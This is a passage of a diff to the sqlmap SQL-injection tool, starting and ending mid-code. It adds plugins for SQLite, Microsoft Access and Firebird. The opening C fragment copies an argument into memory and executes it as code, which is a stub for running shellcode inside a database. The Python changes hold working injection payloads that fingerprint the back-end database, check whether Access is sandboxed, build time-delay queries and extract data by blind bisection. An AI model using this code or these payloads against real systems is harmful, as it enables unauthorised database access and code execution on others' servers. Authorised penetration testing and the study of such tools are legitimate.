strncpy((char *)addr, args->args[0], len);
|
||||
|
||||
((void (*)(void))addr)();
|
||||
}
|
||||
|
||||
if(pID>0)
|
||||
waitpid(pID, 0, WNOHANG);
|
||||
#endif
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
#if defined(_WIN64)
|
||||
void __exec_payload(LPVOID);
|
||||
|
||||
DWORD WINAPI exec_payload(LPVOID lpParameter)
|
||||
{
|
||||
__try
|
||||
{
|
||||
__exec_payload(lpParameter);
|
||||
}
|
||||
__except(EXCEPTION_EXECUTE_HANDLER)
|
||||
{
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
#elif defined(_WIN32) || defined(__WIN32__) || defined(WIN32)
|
||||
DWORD WINAPI exec_payload(LPVOID lpParameter)
|
||||
{
|
||||
__try
|
||||
{
|
||||
__asm
|
||||
{
|
||||
mov eax, [lpParameter]
|
||||
call eax
|
||||
}
|
||||
}
|
||||
__except(EXCEPTION_EXECUTE_HANDLER)
|
||||
{
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
#endif
|
||||
|
||||
#endif /* HAVE_DLOPEN */
|
Binary file not shown.
|
@ -29,11 +29,17 @@ from lib.core.settings import MSSQL_ALIASES
|
|||
from lib.core.settings import MYSQL_ALIASES
|
||||
from lib.core.settings import ORACLE_ALIASES
|
||||
from lib.core.settings import PGSQL_ALIASES
|
||||
from lib.core.settings import SQLITE_ALIASES
|
||||
from lib.core.settings import ACCESS_ALIASES
|
||||
from lib.core.settings import FIREBIRD_ALIASES
|
||||
|
||||
from plugins.dbms.mssqlserver import MSSQLServerMap
|
||||
from plugins.dbms.mysql import MySQLMap
|
||||
from plugins.dbms.oracle import OracleMap
|
||||
from plugins.dbms.postgresql import PostgreSQLMap
|
||||
from plugins.dbms.sqlite import SQLiteMap
|
||||
from plugins.dbms.access import AccessMap
|
||||
from plugins.dbms.firebird import FirebirdMap
|
||||
|
||||
def setHandler():
|
||||
"""
|
||||
|
@ -42,12 +48,15 @@ def setHandler():
|
|||
"""
|
||||
|
||||
count = 0
|
||||
dbmsNames = ( "MySQL", "Oracle", "PostgreSQL", "Microsoft SQL Server" )
|
||||
dbmsNames = ( "MySQL", "Oracle", "PostgreSQL", "Microsoft SQL Server", "SQLite", "Microsoft Access", "Firebird" )
|
||||
dbmsMap = (
|
||||
( MYSQL_ALIASES, MySQLMap ),
|
||||
( ORACLE_ALIASES, OracleMap ),
|
||||
( PGSQL_ALIASES, PostgreSQLMap ),
|
||||
( MSSQL_ALIASES, MSSQLServerMap ),
|
||||
( SQLITE_ALIASES, SQLiteMap ),
|
||||
( ACCESS_ALIASES, AccessMap ),
|
||||
( FIREBIRD_ALIASES, FirebirdMap ),
|
||||
)
|
||||
|
||||
for dbmsAliases, dbmsEntry in dbmsMap:
|
||||
|
|
|
@ -182,6 +182,11 @@ class Agent:
|
|||
@rtype: C{str}
|
||||
"""
|
||||
|
||||
# SQLite version 2 does not support neither CAST() nor IFNULL(),
|
||||
# introduced only in SQLite version 3
|
||||
if kb.dbms == "SQLite":
|
||||
return field
|
||||
|
||||
if field.startswith("(CASE"):
|
||||
nulledCastedField = field
|
||||
else:
|
||||
|
@ -252,12 +257,12 @@ class Agent:
|
|||
@return: query fields (columns) and more details
|
||||
@rtype: C{str}
|
||||
"""
|
||||
|
||||
prefixRegex = "(?:\s+(?:FIRST|SKIP)\s+\d+)*"
|
||||
fieldsSelectTop = re.search("\ASELECT\s+TOP\s+[\d]+\s+(.+?)\s+FROM", query, re.I)
|
||||
fieldsSelectDistinct = re.search("\ASELECT\s+DISTINCT\((.+?)\)\s+FROM", query, re.I)
|
||||
fieldsSelectCase = re.search("\ASELECT\s+(\(CASE WHEN\s+.+\s+END\))", query, re.I)
|
||||
fieldsSelectFrom = re.search("\ASELECT\s+(.+?)\s+FROM\s+", query, re.I)
|
||||
fieldsSelect = re.search("\ASELECT\s+(.*)", query, re.I)
|
||||
fieldsSelectDistinct = re.search("\ASELECT%s\s+DISTINCT\((.+?)\)\s+FROM" % prefixRegex, query, re.I)
|
||||
fieldsSelectCase = re.search("\ASELECT%s\s+(\(CASE WHEN\s+.+\s+END\))" % prefixRegex, query, re.I)
|
||||
fieldsSelectFrom = re.search("\ASELECT%s\s+(.+?)\s+FROM\s+" % prefixRegex, query, re.I)
|
||||
fieldsSelect = re.search("\ASELECT%s\s+(.*)" % prefixRegex, query, re.I)
|
||||
fieldsNoSelect = query
|
||||
|
||||
if fieldsSelectTop:
|
||||
|
@ -284,7 +289,7 @@ class Agent:
|
|||
if kb.dbms == "MySQL":
|
||||
concatenatedQuery = "CONCAT(%s,%s)" % (query1, query2)
|
||||
|
||||
elif kb.dbms in ( "PostgreSQL", "Oracle" ):
|
||||
elif kb.dbms in ( "PostgreSQL", "Oracle", "SQLite" ):
|
||||
concatenatedQuery = "%s||%s" % (query1, query2)
|
||||
|
||||
elif kb.dbms == "Microsoft SQL Server":
|
||||
|
@ -342,7 +347,7 @@ class Agent:
|
|||
elif fieldsNoSelect:
|
||||
concatenatedQuery = "CONCAT('%s',%s,'%s')" % (temp.start, concatenatedQuery, temp.stop)
|
||||
|
||||
elif kb.dbms in ( "PostgreSQL", "Oracle" ):
|
||||
elif kb.dbms in ( "PostgreSQL", "Oracle", "SQLite" ):
|
||||
if fieldsSelectCase:
|
||||
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % temp.start, 1)
|
||||
concatenatedQuery += "||'%s'" % temp.stop
|
||||
|
@ -483,10 +488,14 @@ class Agent:
|
|||
untilFrom = limitedQuery[:fromIndex]
|
||||
fromFrom = limitedQuery[fromIndex+1:]
|
||||
|
||||
if kb.dbms in ( "MySQL", "PostgreSQL" ):
|
||||
if kb.dbms in ( "MySQL", "PostgreSQL", "SQLite" ):
|
||||
limitStr = queries[kb.dbms].limit % (num, 1)
|
||||
limitedQuery += " %s" % limitStr
|
||||
|
||||
elif kb.dbms == "Firebird":
|
||||
limitStr = queries[kb.dbms].limit % (num+1, num+1)
|
||||
limitedQuery += " %s" % limitStr
|
||||
|
||||
elif kb.dbms == "Oracle":
|
||||
if " ORDER BY " in limitedQuery and "(SELECT " in limitedQuery:
|
||||
limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]
|
||||
|
|
|
@ -127,7 +127,7 @@ def formatDBMSfp(versions=None):
|
|||
@rtype: C{str}
|
||||
"""
|
||||
|
||||
if not versions or versions == [None]:
|
||||
if ( not versions or versions == [None] ) and kb.dbmsVersion[0] != "Unknown":
|
||||
versions = kb.dbmsVersion
|
||||
|
||||
if isinstance(versions, str):
|
||||
|
@ -734,14 +734,19 @@ def getDelayQuery(andCond=False):
|
|||
if (kb.dbms == "MySQL" and banVer >= "5.0.12") or (kb.dbms == "PostgreSQL" and banVer >= "8.2"):
|
||||
query = queries[kb.dbms].timedelay % conf.timeSec
|
||||
|
||||
if kb.dbms == "MySQL" and andCond:
|
||||
query = query.replace("SELECT ", "")
|
||||
|
||||
else:
|
||||
query = queries[kb.dbms].timedelay2 % conf.timeSec
|
||||
elif kb.dbms is "Firebird":
|
||||
query = queries[kb.dbms].timedelay
|
||||
else:
|
||||
query = queries[kb.dbms].timedelay % conf.timeSec
|
||||
|
||||
if andCond:
|
||||
if kb.dbms in ( "MySQL", "SQLite" ):
|
||||
query = query.replace("SELECT ", "")
|
||||
elif kb.dbms is "Firebird":
|
||||
query = "(%s)>0" % query
|
||||
|
||||
return query
|
||||
|
||||
def getLocalIP():
|
||||
|
|
|
@ -52,18 +52,30 @@ PYVERSION = sys.version.split()[0]
|
|||
# Url to update Microsoft SQL Server XML versions file from
|
||||
MSSQL_VERSIONS_URL = "http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx"
|
||||
|
||||
# Database managemen system specific variables
|
||||
# Database management system specific variables
|
||||
MSSQL_SYSTEM_DBS = ( "Northwind", "model", "msdb", "pubs", "tempdb" )
|
||||
MYSQL_SYSTEM_DBS = ( "information_schema", "mysql" ) # Before MySQL 5.0 only "mysql"
|
||||
PGSQL_SYSTEM_DBS = ( "information_schema", "pg_catalog", "pg_toast" )
|
||||
ORACLE_SYSTEM_DBS = ( "SYSTEM", "SYSAUX" ) # These are TABLESPACE_NAME
|
||||
SQLITE_SYSTEM_DBS = ( "sqlite_master", "sqlite_temp_master" )
|
||||
ACCESS_SYSTEM_DBS = ( "MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage",\
|
||||
"MSysAccessXML", "MSysModules", "MSysModules2" )
|
||||
FIREBIRD_SYSTEM_DBS = ( "RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE",\
|
||||
"RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS",\
|
||||
"RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES",\
|
||||
"RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS",\
|
||||
"RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS",\
|
||||
"RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS" )
|
||||
|
||||
MSSQL_ALIASES = [ "microsoft sql server", "mssqlserver", "mssql", "ms" ]
|
||||
MYSQL_ALIASES = [ "mysql", "my" ]
|
||||
PGSQL_ALIASES = [ "postgresql", "postgres", "pgsql", "psql", "pg" ]
|
||||
ORACLE_ALIASES = [ "oracle", "orcl", "ora", "or" ]
|
||||
SQLITE_ALIASES = [ "sqlite", "sqlite3" ]
|
||||
ACCESS_ALIASES = [ "access", "jet", "microsoft access", "msaccess" ]
|
||||
FIREBIRD_ALIASES = [ "firebird", "mozilla firebird", "interbase", "ibase", "fb" ]
|
||||
|
||||
SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES
|
||||
SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES
|
||||
SUPPORTED_OS = ( "linux", "windows" )
|
||||
|
||||
SQL_STATEMENTS = {
|
||||
|
|
|
@ -103,6 +103,8 @@ def bannerParser(banner):
|
|||
DBMS banner based upon the data in XML file
|
||||
"""
|
||||
|
||||
xmlfile = None
|
||||
|
||||
if kb.dbms == "Microsoft SQL Server":
|
||||
xmlfile = paths.MSSQL_XML
|
||||
elif kb.dbms == "MySQL":
|
||||
|
@ -112,6 +114,9 @@ def bannerParser(banner):
|
|||
elif kb.dbms == "PostgreSQL":
|
||||
xmlfile = paths.PGSQL_XML
|
||||
|
||||
if not xmlfile:
|
||||
return
|
||||
|
||||
checkFile(xmlfile)
|
||||
|
||||
if kb.dbms == "Microsoft SQL Server":
|
||||
|
|
|
@ -133,6 +133,10 @@ def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, r
|
|||
if kb.dbmsDetected:
|
||||
_, _, _, _, _, expressionFieldsList, expressionFields = agent.getFields(expression)
|
||||
|
||||
rdbRegExp = re.search("RDB\$GET_CONTEXT\([^)]+\)", expression, re.I)
|
||||
if rdbRegExp and kb.dbms == "Firebird":
|
||||
expressionFieldsList = [expressionFields]
|
||||
|
||||
if len(expressionFieldsList) > 1:
|
||||
infoMsg = "the SQL query provided has more than a field. "
|
||||
infoMsg += "sqlmap will now unpack it into distinct queries "
|
||||
|
@ -375,6 +379,9 @@ def getValue(expression, blind=True, inband=True, fromUser=False, expected=None,
|
|||
conf.paramFalseCond = oldParamFalseCond
|
||||
conf.paramNegative = oldParamNegative
|
||||
|
||||
if value:
|
||||
value = value.strip()
|
||||
|
||||
return value
|
||||
|
||||
def goStacked(expression, silent=False):
|
||||
|
|
|
@ -121,9 +121,17 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
|||
queriesCount[0] += 1
|
||||
position = (len(asciiTbl) / 2)
|
||||
posValue = asciiTbl[position]
|
||||
|
||||
if kb.dbms == "SQLite":
|
||||
posValueOld = posValue
|
||||
posValue = chr(posValue)
|
||||
|
||||
forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue))
|
||||
result = Request.queryPage(forgedPayload)
|
||||
|
||||
if kb.dbms == "SQLite":
|
||||
posValue = posValueOld
|
||||
|
||||
if result:
|
||||
minValue = posValue
|
||||
asciiTbl = asciiTbl[position:]
|
||||
|
|
287
plugins/dbms/access.py
Normal file
287
plugins/dbms/access.py
Normal file
|
@ -0,0 +1,287 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
$Id: oracle.py 1003 2010-01-02 02:02:12Z inquisb $
|
||||
|
||||
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
|
||||
|
||||
Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
||||
Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
|
||||
|
||||
sqlmap is free software; you can redistribute it and/or modify it under
|
||||
the terms of the GNU General Public License as published by the Free
|
||||
Software Foundation version 2 of the License.
|
||||
|
||||
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
|
||||
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
|
||||
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
|
||||
details.
|
||||
|
||||
You should have received a copy of the GNU General Public License along
|
||||
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
|
||||
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
||||
"""
|
||||
|
||||
import re
|
||||
|
||||
from lib.core.agent import agent
|
||||
from lib.core.common import formatDBMSfp
|
||||
from lib.core.common import formatFingerprint
|
||||
from lib.core.common import getHtmlErrorFp
|
||||
from lib.core.common import randomInt
|
||||
from lib.core.data import conf
|
||||
from lib.core.data import kb
|
||||
from lib.core.data import logger
|
||||
from lib.core.exception import sqlmapSyntaxException
|
||||
from lib.core.exception import sqlmapUnsupportedFeatureException
|
||||
from lib.core.session import setDbms
|
||||
from lib.core.settings import ACCESS_ALIASES
|
||||
from lib.core.settings import ACCESS_SYSTEM_DBS
|
||||
from lib.core.unescaper import unescaper
|
||||
from lib.request import inject
|
||||
from lib.request.connect import Connect as Request
|
||||
|
||||
from plugins.generic.enumeration import Enumeration
|
||||
from plugins.generic.filesystem import Filesystem
|
||||
from plugins.generic.fingerprint import Fingerprint
|
||||
from plugins.generic.misc import Miscellaneous
|
||||
from plugins.generic.takeover import Takeover
|
||||
|
||||
|
||||
class AccessMap(Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
|
||||
"""
|
||||
This class defines Access methods
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
self.excludeDbsList = ACCESS_SYSTEM_DBS
|
||||
|
||||
Enumeration.__init__(self, "Microsoft Access")
|
||||
Filesystem.__init__(self)
|
||||
Takeover.__init__(self)
|
||||
|
||||
unescaper.setUnescape(AccessMap.unescape)
|
||||
|
||||
@staticmethod
|
||||
def unescape(expression, quote=True):
|
||||
if quote:
|
||||
while True:
|
||||
index = expression.find("'")
|
||||
if index == -1:
|
||||
break
|
||||
|
||||
firstIndex = index + 1
|
||||
index = expression[firstIndex:].find("'")
|
||||
|
||||
if index == -1:
|
||||
raise sqlmapSyntaxException, "Unenclosed ' in '%s'" % expression
|
||||
|
||||
lastIndex = firstIndex + index
|
||||
old = "'%s'" % expression[firstIndex:lastIndex]
|
||||
unescaped = ""
|
||||
|
||||
for i in range(firstIndex, lastIndex):
|
||||
unescaped += "CHR(%d)" % (ord(expression[i]))
|
||||
if i < lastIndex - 1:
|
||||
unescaped += "&"
|
||||
|
||||
expression = expression.replace(old, unescaped)
|
||||
else:
|
||||
unescaped = "".join("CHR(%d)&" % ord(c) for c in expression)
|
||||
if unescaped[-1] == "&":
|
||||
unescaped = unescaped[:-1]
|
||||
|
||||
expression = unescaped
|
||||
|
||||
return expression
|
||||
|
||||
@staticmethod
|
||||
def escape(expression):
|
||||
while True:
|
||||
index = expression.find("CHR(")
|
||||
if index == -1:
|
||||
break
|
||||
|
||||
firstIndex = index
|
||||
index = expression[firstIndex:].find(")")
|
||||
|
||||
if index == -1:
|
||||
raise sqlmapSyntaxException, "Unenclosed ) in '%s'" % expression
|
||||
|
||||
lastIndex = firstIndex + index + 1
|
||||
old = expression[firstIndex:lastIndex]
|
||||
oldUpper = old.upper()
|
||||
oldUpper = oldUpper.lstrip("CHR(").rstrip(")")
|
||||
oldUpper = oldUpper.split("&")
|
||||
|
||||
escaped = "'%s'" % "".join([chr(int(char)) for char in oldUpper])
|
||||
expression = expression.replace(old, escaped).replace("'&'", "")
|
||||
|
||||
return expression
|
||||
|
||||
def __sandBoxCheck(self):
|
||||
# Reference: http://milw0rm.com/papers/198
|
||||
retVal = None
|
||||
table = None
|
||||
if kb.dbmsVersion and len(kb.dbmsVersion) > 0:
|
||||
if kb.dbmsVersion[0] in ("97", "2000"):
|
||||
table = "MSysAccessObjects"
|
||||
elif kb.dbmsVersion[0] in ("2002-2003", "2007"):
|
||||
table = "MSysAccessStorage"
|
||||
if table:
|
||||
query = agent.prefixQuery(" AND EXISTS(SELECT CURDIR() FROM %s)" % table)
|
||||
query = agent.postfixQuery(query)
|
||||
payload = agent.payload(newValue=query)
|
||||
result = Request.queryPage(payload)
|
||||
retVal = "not sandboxed" if result else "sandboxed"
|
||||
|
||||
return retVal
|
||||
|
||||
def __sysTablesCheck(self):
|
||||
infoMsg = "executing system table(s) existance fingerprint"
|
||||
logger.info(infoMsg)
|
||||
|
||||
# Microsoft Access table reference updated on 01/2010
|
||||
sysTables = {
|
||||
"97": ("MSysModules2", "MSysAccessObjects"),
|
||||
"2000" : ("!MSysModules2", "MSysAccessObjects"),
|
||||
"2002-2003" : ("MSysAccessStorage", "!MSysNavPaneObjectIDs"),
|
||||
"2007" : ("MSysAccessStorage", "MSysNavPaneObjectIDs")
|
||||
}
|
||||
# MSysAccessXML is not a reliable system table because it doesn't always exist
|
||||
# ("Access through Access", p6, should be "normally doesn't exist" instead of "is normally empty")
|
||||
|
||||
for version, tables in sysTables.items():
|
||||
exist = True
|
||||
for table in tables:
|
||||
negate = False
|
||||
if table[0] == '!':
|
||||
negate = True
|
||||
table = table[1:]
|
||||
randInt = randomInt()
|
||||
query = agent.prefixQuery(" AND EXISTS(SELECT * FROM %s WHERE %d=%d)" % (table, randInt, randInt))
|
||||
query = agent.postfixQuery(query)
|
||||
payload = agent.payload(newValue=query)
|
||||
result = Request.queryPage(payload)
|
||||
if negate:
|
||||
result = not result
|
||||
exist &= result
|
||||
if not exist:
|
||||
break
|
||||
if exist:
|
||||
return version
|
||||
|
||||
return None
|
||||
|
||||
def getFingerprint(self):
|
||||
value = ""
|
||||
wsOsFp = formatFingerprint("web server", kb.headersFp)
|
||||
|
||||
if wsOsFp:
|
||||
value += "%s\n" % wsOsFp
|
||||
|
||||
if kb.data.banner:
|
||||
dbmsOsFp = formatFingerprint("back-end DBMS", kb.bannerFp)
|
||||
|
||||
if dbmsOsFp:
|
||||
value += "%s\n" % dbmsOsFp
|
||||
|
||||
value += "back-end DBMS: "
|
||||
|
||||
if not conf.extensiveFp:
|
||||
value += "Microsoft Access"
|
||||
return value
|
||||
|
||||
actVer = formatDBMSfp() + " (%s)" % (self.__sandBoxCheck())
|
||||
blank = " " * 15
|
||||
value += "active fingerprint: %s" % actVer
|
||||
|
||||
if kb.bannerFp:
|
||||
banVer = kb.bannerFp["dbmsVersion"]
|
||||
|
||||
if re.search("-log$", kb.data.banner):
|
||||
banVer += ", logging enabled"
|
||||
|
||||
banVer = formatDBMSfp([banVer])
|
||||
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
|
||||
|
||||
htmlErrorFp = getHtmlErrorFp()
|
||||
|
||||
if htmlErrorFp:
|
||||
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
|
||||
|
||||
return value
|
||||
|
||||
def checkDbms(self):
|
||||
if conf.dbms in ACCESS_ALIASES:
|
||||
setDbms("Microsoft Access")
|
||||
if not conf.extensiveFp:
|
||||
return True
|
||||
|
||||
logMsg = "testing Microsoft Access"
|
||||
logger.info(logMsg)
|
||||
|
||||
payload = agent.fullPayload(" AND VAL(CVAR(1))=1")
|
||||
result = Request.queryPage(payload)
|
||||
|
||||
if result:
|
||||
logMsg = "confirming Microsoft Access"
|
||||
logger.info(logMsg)
|
||||
|
||||
payload = agent.fullPayload(" AND IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0")
|
||||
result = Request.queryPage(payload)
|
||||
|
||||
if not result:
|
||||
warnMsg = "the back-end DMBS is not Microsoft Access"
|
||||
logger.warn(warnMsg)
|
||||
return False
|
||||
|
||||
setDbms("Microsoft Access")
|
||||
|
||||
if not conf.extensiveFp:
|
||||
return True
|
||||
|
||||
kb.dbmsVersion = [self.__sysTablesCheck()]
|
||||
|
||||
return True
|
||||
else:
|
||||
warnMsg = "the back-end DMBS is not Microsoft Access"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
return False
|
||||
|
||||
def getPasswordHashes(self):
|
||||
warnMsg = "on Microsoft Access it is not possible to enumerate the user password hashes"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
return {}
|
||||
|
||||
def readFile(self, rFile):
|
||||
errMsg = "on Microsoft Access it is not possible to read files"
|
||||
raise sqlmapUnsupportedFeatureException, errMsg
|
||||
|
||||
def writeFile(self, wFile, dFile, fileType=None, confirm=True):
|
||||
errMsg = "on Microsoft Access it is not possible to write files"
|
||||
raise sqlmapUnsupportedFeatureException, errMsg
|
||||
|
||||
def osCmd(self):
|
||||
errMsg = "on Microsoft Access it is not possible to execute commands"
|
||||
raise sqlmapUnsupportedFeatureException, errMsg
|
||||
|
||||
def osShell(self):
|
||||
errMsg = "on Microsoft Access it is not possible to execute commands"
|
||||
raise sqlmapUnsupportedFeatureException, errMsg
|
||||
|
||||
def osPwn(self):
|
||||
errMsg = "on Microsoft Access it is not possible to establish an "
|
||||
errMsg += "out-of-band connection"
|
||||
raise sqlmapUnsupportedFeatureException, errMsg
|
||||
|
||||
def osSmb(self):
|
||||
errMsg = "on Microsoft Access it is not possible to establish an "
|
||||
errMsg += "out-of-band connection"
|
||||
raise sqlmapUnsupportedFeatureException, errMsg
|
||||
|
||||
def getBanner(self):
|
||||
errMsg = "on Microsoft Access it is not possible to get a banner"
|
||||
raise sqlmapUnsupportedFeatureException, errMsg
|
279
plugins/dbms/firebird.py
Normal file
279
plugins/dbms/firebird.py
Normal file
|
@ -0,0 +1,279 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
$Id: oracle.py 1003 2010-01-02 02:02:12Z inquisb $
|
||||
|
||||
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
|
||||
|
||||
Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
||||
Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
|
||||
|
||||
sqlmap is free software; you can redistribute it and/or modify it under
|
||||
the terms of the GNU General Public License as published by the Free
|
||||
Software Foundation version 2 of the License.
|
||||
|
||||
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
|
||||
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
|
||||
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
|
||||
details.
|
||||
|
||||
You should have received a copy of the GNU General Public License along
|
||||
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
|
||||
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
||||
"""
|
||||
|
||||
import re
|
||||
|
||||
from lib.core.agent import agent
|
||||
from lib.core.common import formatDBMSfp
|
||||
from lib.core.common import formatFingerprint
|
||||
from lib.core.common import getHtmlErrorFp
|
||||
from lib.core.common import randomInt, randomRange
|
||||
from lib.core.data import conf
|
||||
from lib.core.data import kb
|
||||
from lib.core.data import logger
|
||||
from lib.core.exception import sqlmapSyntaxException
|
||||
from lib.core.exception import sqlmapUnsupportedFeatureException
|
||||
from lib.core.session import setDbms
|
||||
from lib.core.settings import FIREBIRD_ALIASES
|
||||
from lib.core.settings import FIREBIRD_SYSTEM_DBS
|
||||
from lib.core.unescaper import unescaper
|
||||
from lib.request import inject
|
||||
from lib.request.connect import Connect as Request
|
||||
|
||||
from plugins.generic.enumeration import Enumeration
|
||||
from plugins.generic.filesystem import Filesystem
|
||||
from plugins.generic.fingerprint import Fingerprint
|
||||
from plugins.generic.misc import Miscellaneous
|
||||
from plugins.generic.takeover import Takeover
|
||||
|
||||
|
||||
class FirebirdMap(Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
|
||||
"""
|
||||
This class defines Firebird methods
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
self.excludeDbsList = FIREBIRD_SYSTEM_DBS
|
||||
|
||||
Enumeration.__init__(self, "Firebird")
|
||||
Filesystem.__init__(self)
|
||||
Takeover.__init__(self)
|
||||
|
||||
unescaper.setUnescape(FirebirdMap.unescape)
|
||||
|
||||
@staticmethod
|
||||
def unescape(expression, quote=True):
|
||||
if quote:
|
||||
while True:
|
||||
index = expression.find("'")
|
||||
if index == -1:
|
||||
break
|
||||
|
||||
firstIndex = index + 1
|
||||
index = expression[firstIndex:].find("'")
|
||||
|
||||
if index == -1:
|
||||
raise sqlmapSyntaxException, "Unenclosed ' in '%s'" % expression
|
||||
|
||||
lastIndex = firstIndex + index
|
||||
old = "'%s'" % expression[firstIndex:lastIndex]
|
||||
unescaped = ""
|
||||
|
||||
for i in range(firstIndex, lastIndex):
|
||||
unescaped += "ASCII_CHAR(%d)" % (ord(expression[i]))
|
||||
if i < lastIndex - 1:
|
||||
unescaped += "||"
|
||||
|
||||
expression = expression.replace(old, unescaped)
|
||||
else:
|
||||
unescaped = "".join("ASCII_CHAR(%d)||" % ord(c) for c in expression)
|
||||
if unescaped[-1] == "||":
|
||||
unescaped = unescaped[:-1]
|
||||
|
||||
expression = unescaped
|
||||
|
||||
return expression
|
||||
|
||||
@staticmethod
|
||||
def escape(expression):
|
||||
while True:
|
||||
index = expression.find("ASCII_CHAR(")
|
||||
if index == -1:
|
||||
break
|
||||
|
||||
firstIndex = index
|
||||
index = expression[firstIndex:].find(")")
|
||||
|
||||
if index == -1:
|
||||
raise sqlmapSyntaxException, "Unenclosed ) in '%s'" % expression
|
||||
|
||||
lastIndex = firstIndex + index + 1
|
||||
old = expression[firstIndex:lastIndex]
|
||||
oldUpper = old.upper()
|
||||
oldUpper = oldUpper.lstrip("ASCII_CHAR(").rstrip(")")
|
||||
oldUpper = oldUpper.split("||")
|
||||
|
||||
escaped = "'%s'" % "".join([chr(int(char)) for char in oldUpper])
|
||||
expression = expression.replace(old, escaped).replace("'||'", "")
|
||||
|
||||
return expression
|
||||
|
||||
def getFingerprint(self):
|
||||
value = ""
|
||||
wsOsFp = formatFingerprint("web server", kb.headersFp)
|
||||
|
||||
if wsOsFp:
|
||||
value += "%s\n" % wsOsFp
|
||||
|
||||
if kb.data.banner:
|
||||
dbmsOsFp = formatFingerprint("back-end DBMS", kb.bannerFp)
|
||||
|
||||
if dbmsOsFp:
|
||||
value += "%s\n" % dbmsOsFp
|
||||
|
||||
value += "back-end DBMS: "
|
||||
|
||||
if not conf.extensiveFp:
|
||||
value += "Firebird"
|
||||
return value
|
||||
|
||||
actVer = formatDBMSfp() + " (%s)" % (self.__dialectCheck())
|
||||
blank = " " * 15
|
||||
value += "active fingerprint: %s" % actVer
|
||||
|
||||
if kb.bannerFp:
|
||||
banVer = kb.bannerFp["dbmsVersion"]
|
||||
|
||||
if re.search("-log$", kb.data.banner):
|
||||
banVer += ", logging enabled"
|
||||
|
||||
banVer = formatDBMSfp([banVer])
|
||||
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
|
||||
|
||||
htmlErrorFp = getHtmlErrorFp()
|
||||
|
||||
if htmlErrorFp:
|
||||
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
|
||||
|
||||
return value
|
||||
|
||||
def __sysTablesCheck(self):
|
||||
retVal = None
|
||||
table = (
|
||||
("1.0", [" AND EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)"]),
|
||||
("1.5", [" AND NULLIF(%d,%d) IS NULL", " AND EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)"]),
|
||||
("2.0", [" AND EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", " AND BIT_LENGTH(%d)>0", " AND CHAR_LENGTH(%d)>0"]),
|
||||
("2.1", [" AND BIN_XOR(%d,%d)=0", " AND PI()>0.%d", " AND RAND()<1.%d", " AND FLOOR(1.%d)>=0"])
|
||||
)
|
||||
|
||||
for i in xrange(len(table)):
|
||||
version, checks = table[i]
|
||||
failed = False
|
||||
check = checks[randomRange(0,len(checks)-1)].replace("%d", str(randomRange(1,100)))
|
||||
payload = agent.fullPayload(check)
|
||||
result = Request.queryPage(payload)
|
||||
if result:
|
||||
retVal = version
|
||||
else:
|
||||
failed = True
|
||||
break
|
||||
if failed:
|
||||
break
|
||||
|
||||
return retVal
|
||||
|
||||
def __dialectCheck(self):
|
||||
retVal = None
|
||||
if kb.dbms:
|
||||
